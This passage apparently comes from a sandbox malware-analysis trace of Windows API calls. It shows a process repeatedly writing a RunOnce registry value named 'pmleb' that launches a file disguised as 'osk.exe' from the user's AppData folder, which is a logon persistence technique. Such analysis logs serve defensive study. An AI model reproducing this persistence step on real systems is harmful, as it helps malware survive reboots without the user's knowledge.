ppv=0x33f3b0*=0x787518) returned 0x0 [0077.741] IUnknown:Release (This=0x787518) returned 0x1 [0077.741] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.741] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.741] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.742] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.742] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.742] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.742] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.742] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.742] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.742] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x14 [0077.742] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.742] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x15 [0077.742] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.743] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x14 [0077.743] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.743] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.743] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.743] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.743] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.743] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.743] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.743] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.744] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.744] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.744] RegCloseKey (hKey=0x280) returned 0x0 [0077.744] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.744] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.744] SetTimer (hWnd=0x20280, nIDEvent=0x2014, uElapse=0xa, lpTimerFunc=0x0) returned 0x2014 [0077.744] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.756] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.756] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.756] KillTimer (hWnd=0x20280, uIDEvent=0x2014) returned 1 [0077.756] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.756] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.756] IUnknown:Release (This=0x787518) returned 0x1 [0077.757] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.757] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.757] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.757] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.757] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.757] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.757] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.757] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.757] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.757] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x15 [0077.757] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.757] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x16 [0077.757] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.758] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x15 [0077.758] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.758] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.758] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.758] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.758] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.758] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.758] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.759] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.759] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.759] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.759] RegCloseKey (hKey=0x280) returned 0x0 [0077.759] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.759] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.759] SetTimer (hWnd=0x20280, nIDEvent=0x2015, uElapse=0xa, lpTimerFunc=0x0) returned 0x2015 [0077.759] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.834] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.834] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.834] KillTimer (hWnd=0x20280, uIDEvent=0x2015) returned 1 [0077.835] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.835] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.835] IUnknown:Release (This=0x787518) returned 0x1 [0077.835] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.835] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.835] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.835] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.835] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.835] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.835] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.835] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.836] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.836] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x16 [0077.836] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.836] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x17 [0077.836] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.837] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x16 [0077.837] ??2@YAPAXI@Z () returned 0x2b511b0 [0077.837] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.837] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.837] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.837] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.837] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.837] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.837] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.837] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.837] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.837] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.838] RegCloseKey (hKey=0x280) returned 0x0 [0077.838] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.838] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.838] SetTimer (hWnd=0x20280, nIDEvent=0x2016, uElapse=0xa, lpTimerFunc=0x0) returned 0x2016 [0077.838] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 